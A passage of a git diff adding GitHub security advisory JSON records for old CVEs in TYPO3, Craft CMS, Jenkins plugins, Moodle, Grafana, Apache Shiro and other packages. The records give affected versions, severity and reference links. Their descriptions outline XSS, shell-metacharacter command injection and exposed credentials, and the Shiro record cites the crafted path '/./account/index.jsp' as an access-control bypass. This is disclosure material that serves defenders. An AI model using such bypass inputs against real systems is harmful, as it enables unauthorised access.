+ ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3alpha1" + }, + { + "fixed": "4.3beta2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3628" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53917" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:36:52Z", + "nvd_published_at": "2009-11-02T15:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json b/advisories/github-reviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json new file mode 100644 index 0000000000000..2aa0c8bd581a5 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33jj-92px-m4g7", + "modified": "2024-02-01T21:17:50Z", + "published": "2022-05-24T17:45:29Z", + "aliases": [ + "CVE-2020-19626" + ], + "summary": "Craft CMS Cross-site Scripting Vulnerability", + "details": "Cross Site Scripting (XSS) vulnerability in craftcms 3.1.31, allows remote attackers to inject arbitrary web script or HTML, via `/admin/settings/sites/new`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.33" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19626" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/commit/76a2168b6a5e30144f5c06da4ff264f4eca577ff" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20211209121705/http://mayoterry.com/file/cve/XSS_vuluerability_in_Craftcms_3.1.31.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:17:50Z", + "nvd_published_at": "2021-03-26T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json b/advisories/github-reviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json new file mode 100644 index 0000000000000..01959cfb2a427 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3858-58w9-wpcg", + "modified": "2024-01-30T22:28:39Z", + "published": "2022-05-13T01:31:34Z", + "aliases": [ + "CVE-2019-1003021" + ], + "summary": "Jenkins OpenId Connect Authentication Plugin showed plain text client secret in configuration form", + "details": "An exposure of sensitive information vulnerability exists in Jenkins OpenId Connect Authentication Plugin 1.4 and earlier in OicSecurityRealm/config.jelly that allows attackers able to view a Jenkins administrator's web browser output, or control the browser (e.g. malicious extension) to retrieve the configured client secret.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:oic-auth" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.4" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003021" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-886" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:28:39Z", + "nvd_published_at": "2019-02-06T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json b/advisories/github-reviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json new file mode 100644 index 0000000000000..77219359d5760 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3892-qqv6-h2qm", + "modified": "2024-01-30T22:42:18Z", + "published": "2022-05-14T03:18:39Z", + "aliases": [ + "CVE-2018-1000177" + ], + "summary": "Stored XSS vulnerability in Jenkins S3 Publisher Plugin", + "details": "A cross-site scripting vulnerability exists in Jenkins S3 Plugin 0.10.12 and older in src/main/resources/hudson/plugins/s3/S3ArtifactsProjectAction/jobMain.jelly that allows attackers able to control file names of uploaded files to define file names containing JavaScript that would be executed in another user's browser when that user performs some UI actions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:s3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.11.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.10.12" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000177" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-04-16/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:42:10Z", + "nvd_published_at": "2018-05-08T15:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json b/advisories/github-reviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json new file mode 100644 index 0000000000000..faba0e4a1943c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json @@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39vm-rvwh-q86j", + "modified": "2024-02-07T22:52:33Z", + "published": "2022-05-14T02:42:14Z", + "aliases": [ + "CVE-2010-4616" + ], + "summary": "ImpressCMS Cross-site Scripting vulnerability via quicksearch_ContentContent parameter", + "details": "Cross-site scripting (XSS) vulnerability in modules/content/admin/content.php in ImpressCMS 1.2.3 Final, and possibly other versions before 1.2.4, allows remote attackers to inject arbitrary web script or HTML via the quicksearch_ContentContent parameter.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "impresscms/impresscms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.2.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4616" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ImpressCMS/impresscms" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101223135531/http://secunia.com/advisories/42695" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20201209001614/http://www.securityfocus.com/archive/1/515397/100/0/threaded" + }, + { + "type": "WEB", + "url": "http://community.impresscms.org/modules/smartsection/item.php?itemid=525" + }, + { + "type": "WEB", + "url": "http://www.htbridge.ch/advisory/xss_vulnerability_in_impresscms.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:52:33Z", + "nvd_published_at": "2010-12-29T22:33:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json b/advisories/github-reviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json new file mode 100644 index 0000000000000..2bbebf827fea9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3ccq-gccx-pm7j", + "modified": "2024-01-30T21:54:16Z", + "published": "2022-05-13T01:18:46Z", + "aliases": [ + "CVE-2018-1000425" + ], + "summary": "Jenkins SonarQube Scanner Plugin stored server authentication token in plain text", + "details": "An insufficiently protected credentials vulnerability exists in Jenkins SonarQube Scanner Plugin 2.8 and earlier in SonarInstallation.java that allows attackers with local file system access to obtain the credentials used to connect to SonarQube.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:sonar" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.8.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.8" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000425" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1163" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/106532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:54:16Z", + "nvd_published_at": "2019-01-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json b/advisories/github-reviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json new file mode 100644 index 0000000000000..9572327d864ce --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json @@ -0,0 +1,127 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3cqw-pxgr-jhrm", + "modified": "2024-02-08T21:38:02Z", + "published": "2022-05-02T03:46:56Z", + "aliases": [ + "CVE-2009-3631" + ], + "summary": "TYPO3 Backend Command Injection via Shell Metacharacters in Uploaded File Name", + "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2, when the DAM extension or ftp upload is enabled, allows remote authenticated users to execute arbitrary commands via shell metacharacters in a filename.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.0.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3alpha1" + }, + { + "fixed": "4.3beta2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3631" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53923" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:38:01Z", + "nvd_published_at": "2009-11-02T15:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json b/advisories/github-reviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json new file mode 100644 index 0000000000000..98e1584833d6b --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3fpx-g9h3-hh8x", + "modified": "2024-01-30T21:17:55Z", + "published": "2022-05-24T22:00:44Z", + "aliases": [ + "CVE-2019-10430" + ], + "summary": "Jenkins NeuVector Vulnerability Scanner Plugin stored credentials in plain text ", + "details": "Jenkins NeuVector Vulnerability Scanner Plugin 1.5 and earlier stored credentials unencrypted in its global configuration file on the Jenkins master where they could be viewed by users with access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.plugins:neuvector-vulnerability-scanner" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10430" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1504" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-312" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:17:55Z", + "nvd_published_at": "2019-09-25T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json b/advisories/github-reviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json new file mode 100644 index 0000000000000..4cfd5bd28d161 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json @@ -0,0 +1,141 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3gm8-32vv-q8mp", + "modified": "2024-02-07T22:53:57Z", + "published": "2022-05-13T01:13:04Z", + "aliases": [ + "CVE-2010-2230" + ], + "summary": "Moodle Cross-site Scripting vulnerability in the KSES text cleaning filter ", + "details": "The KSES text cleaning filter in lib/weblib.php in Moodle before 1.8.13 and 1.9.x before 1.9.9 does not properly handle vbscript URIs, which allows remote authenticated users to conduct cross-site scripting (XSS) attacks via HTML input.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.8.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.9.0" + }, + { + "fixed": "1.9.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2230" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/704c5dfed4f4531b6d74d19cfad573984e74885e" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=605809" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moodle/moodle" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100621005117/http://secunia.com/advisories/40248" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100711044720/http://secunia.com/advisories/40352" + }, + { + "type": "WEB", + "url": "http://cvs.moodle.org/moodle/lib/weblib.php?r1=1.812.2.114&r2=1.812.2.115" + }, + { + "type": "WEB", + "url": "http://cvs.moodle.org/moodle/lib/weblib.php?r1=1.970.2.171&r2=1.970.2.172" + }, + { + "type": "WEB", + "url": "http://docs.moodle.org/en/Moodle_1.8.13_release_notes" + }, + { + "type": "WEB", + "url": "http://docs.moodle.org/en/Moodle_1.9.9_release_notes" + }, + { + "type": "WEB", + "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043285.html" + }, + { + "type": "WEB", + "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043291.html" + }, + { + "type": "WEB", + "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043340.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2010-08/msg00001.html" + }, + { + "type": "WEB", + "url": "http://moodle.org/mod/forum/discuss.php?d=152368" + }, + { + "type": "WEB", + "url": "http://tracker.moodle.org/browse/MDL-22042" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2010/06/21/2" + }, + { + "type": "WEB", + "url": "http://www.vupen.com/english/advisories/2010/1530" + }, + { + "type": "WEB", + "url": "http://www.vupen.com/english/advisories/2010/1571" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:53:57Z", + "nvd_published_at": "2010-06-28T17:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3hxw-g85p-qgxm/GHSA-3hxw-g85p-qgxm.json b/advisories/github-reviewed/2022/05/GHSA-3hxw-g85p-qgxm/GHSA-3hxw-g85p-qgxm.json index ee611b6870f81..655363bf3c473 100644 --- a/advisories/github-reviewed/2022/05/GHSA-3hxw-g85p-qgxm/GHSA-3hxw-g85p-qgxm.json +++ b/advisories/github-reviewed/2022/05/GHSA-3hxw-g85p-qgxm/GHSA-3hxw-g85p-qgxm.json @@ -32,10 +32,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.1.0" - } + ] }, { "package": { @@ -54,10 +51,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.1.0" - } + ] } ], "references": [ @@ -65,6 +59,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11830" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/phar-stream-wrapper/CVE-2019-11830.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/phar-stream-wrapper" @@ -77,6 +75,22 @@ "type": "WEB", "url": "https://github.com/TYPO3/phar-stream-wrapper/releases/tag/v3.1.1" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/65ODQHDHWR74L6TCAPAQR5FQHG6MCXAW/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AUEXS4HRI4XZ2DTZMWAVQBYBTFSJ34AR/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U6JX7WR6DPMKCZQP7EYFACYXSGJ3K523/" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-psa-2019-008" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-psa-2019-008/" diff --git a/advisories/github-reviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json b/advisories/github-reviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json new file mode 100644 index 0000000000000..0f72f3940e26b --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json @@ -0,0 +1,82 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jq7-8ph8-63xm", + "modified": "2024-02-01T21:46:49Z", + "published": "2022-05-24T17:16:53Z", + "aliases": [ + "CVE-2020-12458" + ], + "summary": "Grafana information disclosure", + "details": "An information-disclosure flaw was found in Grafana. The database directory `/var/lib/grafana` and database file `/var/lib/grafana/grafana.db` are world readable. This can result in exposure of sensitive information (e.g., cleartext or encrypted datasource passwords).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12458" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/issues/8283" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/102448040d5132460e3b0013e03ebedec0677e00" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2020-12458" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1827765" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CTQCKJZZYXMCSHJFZZ3YXEO5NUBANGZS/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEBCIEVSYIDDCA7FTRS2IFUOYLIQU34A/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200518-0001/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-312", + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:46:49Z", + "nvd_published_at": "2020-04-29T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json b/advisories/github-reviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json new file mode 100644 index 0000000000000..02fa8ace3c9fd --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json @@ -0,0 +1,78 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jx9-mgwx-4q83", + "modified": "2024-02-07T22:57:26Z", + "published": "2022-05-14T02:42:51Z", + "aliases": [ + "CVE-2010-3863" + ], + "summary": "Apache Shiro Path Traversal vulnerability", + "details": "Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.shiro:shiro-root" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3863" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/62959" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/shiro" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101120091718/http://www.vupen.com/english/advisories/2010/2888" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101129043410/http://secunia.com/advisories/41989" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20110929165859/http://www.securityfocus.com/bid/44616" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20161017000748/http://www.securityfocus.com/archive/1/514616/100/0/threaded" + }, + { + "type": "WEB", + "url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-11/0020.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:57:26Z", + "nvd_published_at": "2010-11-05T17:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json b/advisories/github-reviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json new file mode 100644 index 0000000000000..9db1520401eed --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json @@ -0,0 +1,136 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mqf-fwc6-vwqw", + "modified": "2024-02-07T23:43:12Z", + "published": "2022-05-17T01:55:58Z", + "aliases": [ + "CVE-2010-5098" + ], + "summary": "TYPO3 Cross-site scripting (XSS) vulnerability in the FORM content object ", + "details": "Cross-site scripting (XSS) vulnerability in the FORM content object in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5098" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/3c5d15233ca765fabeac21f0600d831595d31cd8" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/4e8bd7a15681c0683196984e871f60f0646ea2b6" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/6d17fe7cef30b09a65e0c2d54f8871ec3ddfc67e" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64179" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/frontend" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101229020821/http://secunia.com/advisories/35770" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111025222220/http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-022/" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111223211753/http://www.securityfocus.com/bid/45470" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/12/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:40:36Z", + "nvd_published_at": "2012-05-21T20:55:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json b/advisories/github-reviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json new file mode 100644 index 0000000000000..f9ee59e0ee8d2 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3q6p-r6rr-266x", + "modified": "2024-01-30T22:10:41Z", + "published": "2022-05-14T00:58:29Z", + "aliases": [ + "CVE-2017-1000113" + ], + "summary": "Jenkins Deploy to container Plugin stored plain text passwords in job configuration", + "details": "The Deploy 